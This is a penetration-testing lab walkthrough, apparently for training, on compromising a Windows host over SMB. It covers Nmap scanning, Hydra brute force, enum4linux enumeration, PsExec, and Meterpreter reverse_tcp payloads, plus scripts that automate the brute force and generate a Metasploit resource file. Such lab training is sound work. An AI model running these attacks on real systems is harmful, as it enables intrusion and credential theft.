Windows - Targeting SMB

This document outlines a step-by-step process for exploiting the SMB service on a Windows target using Kali Linux. It includes instructions for identifying the target IP, performing port scans, conducting brute force attacks to obtain credentials, and using PsExec for remote access. The lab demonstrates how to leverage these techniques to gain access to the target system effectively.

Solution

Step 1: Open the lab link to access the Kali GUI instance

Step 2: Identify the target IP address

Before we get started, you will need to obtain the IP address of the target system within the lab
environment.

You can obtain the target IP address by viewing the content of the /etc/hosts file on the Kali
Linux system.

This can be done by running the following command:

Command:

cat /etc/hosts

The target system is reachable as demo.ine.local. Copy the IP address that corresponds to that
hostname.

Note: Your target IP address will be different, so make sure to substitute the IP shown in the
commands below with the one in your lab.

Alternatively, you can also ping demo.ine.local to obtain the IP address of the target system.
This can be done by running the following command:

Command:

ping demo.ine.local

In this case, the target IP address is 10.0.31.252.

Step 3: Port scanning with Nmap

In this lab we are targeting SMB, so the Nmap scan can be limited to port 445.

We can identify vulnerabilities or misconfigurations on the SMB service by running the default
Nmap script set (-sC) together with version detection (-sV) against that port. This can be
done by running the following command:

Command:

nmap -sV -sC -p 445 10.0.31.252

As shown in the following screenshot, the default scripts (smb-os-discovery and
smb2-security-mode) reveal the specific version of Windows running on the target as well as
the SMB security mode, i.e. whether SMB message signing is enabled and whether it is required.
Keep a note of the signing status: signing that is enabled but not required is what makes NTLM
relay attacks against the host possible, while signing that is required rules them out.
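
The following bash script is an added example, not part of the lab: it wraps the scan above so that the output is saved with -oN and then extracts the two facts the next steps depend on, the OS string from smb-os-discovery and the message-signing status from smb2-security-mode. The sample output embedded in the script is constructed in the layout of Nmap's normal output (it is not this target's actual result), and scan_smb() with its target and output path are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the lab): scan port 445 with the default scripts,
# keep the normal output on disk, and pull out the two facts that matter for
# the next steps: the OS string and whether SMB message signing is required.
# "enabled but not required" is the relay-friendly setting; "required" is
# the hardened one.
set -eu

# Run the lab's scan and save the output.  Target and output path are
# assumptions; substitute your own.  (Not exercised by the offline checks.)
scan_smb() {
    target="$1"; out="${2:-smb_scan.nmap}"
    nmap -sV -sC -p 445 -oN "$out" "$target" >/dev/null
    printf '%s\n' "$out"
}

# Print the OS line reported by smb-os-discovery, or "unknown".
smb_os() {
    os=$(sed -n 's/^|[ _]*OS: *//p' "$1" | head -n 1)
    printf '%s\n' "${os:-unknown}"
}

# Classify message signing from smb2-security-mode / smb-security-mode:
#   required      signing enforced (relay not possible)
#   not-required  signing supported but optional (relay candidate)
#   disabled      signing off entirely
#   unknown       script did not run or output not recognised
smb_signing() {
    line=$(grep -i 'message signing' "$1" | head -n 1)
    case "$line" in
        *"not required"*) echo not-required ;;
        *"required"*)     echo required ;;
        *"disabled"*)     echo disabled ;;
        *)                echo unknown ;;
    esac
}

# Constructed sample in the layout of nmap's normal output (not the lab's
# real result; your scan will differ).
sample_scan() {
    cat <<'EOF'
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   Computer name: vagrant-2012-r2
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
EOF
}
```

Run scan_smb 10.0.31.252 to produce the file, then smb_signing smb_scan.nmap; only the "required" answer rules out NTLM relay against this host, and that single word is worth recording alongside the OS version in your notes.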

Step 4: SMB brute force

In the previous labs, we identified various user accounts through SSH and FTP brute force
attacks. We can reuse those usernames in a brute force attack to identify legitimate SMB
credentials for the target system.

So far, we have identified two user accounts:

1. Administrator
2. vagrant

Limiting the brute force attack to these usernames reduces the time required to perform it.
Note that repeated failed SMB logons can trip an account lockout policy, so check the policy
(or keep the attempt rate low) before spraying passwords at anything other than a lab host.

We can use the Hydra tool to perform an SMB brute-force attack. This can be done by running
the following command:

Command:

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.31.252 smb

As shown in the following screenshot, after a couple of minutes we are able to identify
the Administrator account password, which in this case is vagrant.

We can also perform the brute force attack with the user vagrant to identify the password for
the user account by running the following command:

Command:

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.31.252 smb

So far, we have identified legitimate passwords for both the Administrator and vagrant user
accounts.

Step 5: Enumerating user accounts with enum4linux

Now that we have legitimate SMB credentials, we can use them to enumerate other user
accounts on the Windows target by leveraging an enumeration utility called enum4linux.

This can be done by running the following command:

Command:

enum4linux -u vagrant -p vagrant -U 10.0.31.252

As shown in the following screenshot, we are successfully able to identify other user accounts
on the Windows target. This information is very useful as it can be used to fine tune our brute
force attacks by limiting the brute force to these usernames.
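As an added example (not from the lab), the script below connects Step 4 and Step 5: it turns the enum4linux -U listing into a username file, runs hydra with -L over that file instead of one -l user at a time, and parses hydra's result lines into user:password pairs for the next step. The enum4linux and hydra samples embedded in it are constructed in those tools' output formats, not the lab's real output; the target address, wordlist path and the -t 1 rate limit are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not part of the lab): close the loop the text describes.
# Take enum4linux's user listing, turn it into a username file, run hydra
# against that file, and collect every credential hydra reports.
set -eu

# Extract usernames from enum4linux -U output.  The section prints both
# "user:[name] rid:[0x...]" (enumdomusers) and
# "index: ... Account: name Name: ..." (querydispinfo) lines; accept either,
# drop duplicates, and ignore machine accounts (trailing $).
enum4linux_users() {
    sed -n -e 's/^user:\[\([^]]*\)].*/\1/p' \
           -e 's/^index:.*Account: \([^[:space:]]*\).*/\1/p' "$1" \
    | grep -v '\$$' | sort -u
}

# Parse hydra's result lines, e.g.
#   [445][smb] host: 10.0.31.252   login: vagrant   password: vagrant
# into "login:password" pairs.
hydra_creds() {
    sed -n 's/^\[[0-9]*]\[smb] host: [^ ]* *login: \([^ ]*\) *password: \(.*\)$/\1:\2/p' "$1"
}

# Run the brute force with a username list (-L) rather than a single -l user.
# -t 1 keeps it to one connection at a time: SMB brute forcing can hit the
# account lockout threshold, and a locked Administrator ends the engagement.
# Target, wordlist and output path are assumptions.  (Not exercised by the
# offline checks.)
smb_bruteforce() {
    target="$1"; users="$2"; out="${3:-hydra_smb.txt}"
    hydra -t 1 -L "$users" -P /usr/share/wordlists/metasploit/unix_passwords.txt \
          -o "$out" "$target" smb >/dev/null || true
    hydra_creds "$out"
}

# Constructed samples in the real tools' output layouts (not the lab's output).
sample_enum4linux() {
    cat <<'EOF'
 ==============================
|    Users on 10.0.31.252    |
 ==============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account
index: 0x2 RID: 0x3e8 acb: 0x00000210 Account: vagrant Name: (null) Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[vagrant] rid:[0x3e8]
user:[VAGRANT-2012-R2$] rid:[0x3e9]
EOF
}
sample_hydra() {
    cat <<'EOF'
Hydra v9.1 (c) 2020 by van Hauser/THC - constructed sample header
[445][smb] host: 10.0.31.252   login: administrator   password: vagrant
[445][smb] host: 10.0.31.252   login: vagrant   password: vagrant
1 of 1 target successfully completed, 2 valid passwords found
EOF
}
```

In the lab you would run enum4linux -u vagrant -p vagrant -U 10.0.31.252 > users.raw, then enum4linux_users users.raw > users.txt and smb_bruteforce 10.0.31.252 users.txt; the user:password lines it prints are exactly what psexec.py and the Metasploit module in Step 6 consume.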

Step 6: SMB authentication with PsExec

Given that we have legitimate user credentials for the Windows target, we can authenticate to
it over SMB in order to obtain remote access. This can be done with the Python implementation
of PsExec that ships with Impacket, psexec.py (on current Kali images the same script is also
installed as impacket-psexec).

To begin with, copy the psexec.py script from the python3-impacket examples directory to your
working directory (the Desktop, in this case). This can be done by running the following command:

Command:

cp /usr/share/doc/python3-impacket/examples/psexec.py /root/Desktop

You will then need to make psexec.py executable (run this from /root/Desktop, where you copied
it). This can be done by running the following command:

Command:

chmod +x psexec.py

We can now run psexec.py with the username Administrator. This can be done by running the
following command:

Command:

python3 psexec.py Administrator@10.0.31.252

As shown in the following screenshot, you will be prompted to provide the password for
the Administrator user, which in this case is vagrant.

As shown in the preceding screenshot, after successful authentication you are given a command
shell on the Windows target. Because PsExec works by installing and starting a service, that
shell runs as NT AUTHORITY\SYSTEM even though you authenticated as Administrator; whoami
confirms this.

We can also use the exploit/windows/smb/psexec Metasploit module to obtain a Meterpreter
session on the target system.

We will first need to start the Metasploit Framework Console (msfconsole), this can be done by
running the following command:

Command:

msfconsole

We can then load the module, by running the following command:

Command:

use exploit/windows/smb/psexec

After loading the module, we will need to configure the module options; in this case, we will
need to set the target IP and the SMB credentials for authentication. This can be done by
running the following commands:

Command:

set RHOSTS 10.0.31.252

Command:

set SMBUser Administrator

Command:

set SMBPass vagrant

We will also need to set a 64-bit Meterpreter payload (the module defaults to the 32-bit
windows/meterpreter/reverse_tcp). This can be done by running the following command:

Command:

set payload windows/x64/meterpreter/reverse_tcp

Before running the module, check with show options that LHOST points at your Kali interface
on the lab network; a wrong LHOST is the usual reason a reverse_tcp stage never calls back.

After configuring the module options we can execute the module by running the following
command:

Command:

exploit

As shown in the following screenshot, if successful, the module authenticates to the Windows
target via SMB with the credentials you specified and executes a Meterpreter payload on the
target system, providing you with remote access to it.
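The following script is an added example, not part of the lab or of the Metasploit project: it generates a resource script for exploit/windows/smb/psexec from the values above and validates both addresses before msfconsole sees them, since an unreachable or mistyped LHOST is the usual reason a reverse_tcp Meterpreter stage never calls back. The LHOST value, LPORT 4444 and the output file name are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the lab): drive exploit/windows/smb/psexec from a
# resource script instead of typing the options by hand, checking the two
# addresses first.
set -eu

# Return 0 if $1 is a dotted-quad IPv4 address with every octet <= 255.
is_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    oldIFS=$IFS; IFS=.; set -- $1; IFS=$oldIFS
    for o in "$@"; do [ "$o" -le 255 ] || return 1; done
}

# write_psexec_rc RHOSTS SMBUser SMBPass LHOST [file]
# Emit an msfconsole resource script for the lab's module and print its path.
# LHOST is the Kali address the reverse shell connects back to; it must be
# reachable from the target.  Payload matches the lab text; LPORT 4444 is the
# module default and an assumption here.
write_psexec_rc() {
    rhost="$1"; user="$2"; pass="$3"; lhost="$4"; out="${5:-psexec.rc}"
    is_ipv4 "$rhost" || { echo "bad RHOSTS: $rhost" >&2; return 1; }
    is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/windows/smb/psexec
set RHOSTS $rhost
set SMBUser $user
set SMBPass $pass
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
exploit
EOF
    printf '%s\n' "$out"
}

# Usage with assumed addresses (Kali at 10.10.1.5):
#   msfconsole -q -r "$(write_psexec_rc 10.0.31.252 Administrator vagrant 10.10.1.5)"
```

The generated file replaces the seven manual commands above; once msfconsole has loaded it, show options confirms every value that was set and sessions -l lists the Meterpreter session after the exploit line runs.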

Conclusion

In this lab, we explored the process of exploiting the SMB service running on a Windows target
by performing an SMB brute force attack and leveraging PsExec to obtain remote access to the
target system.
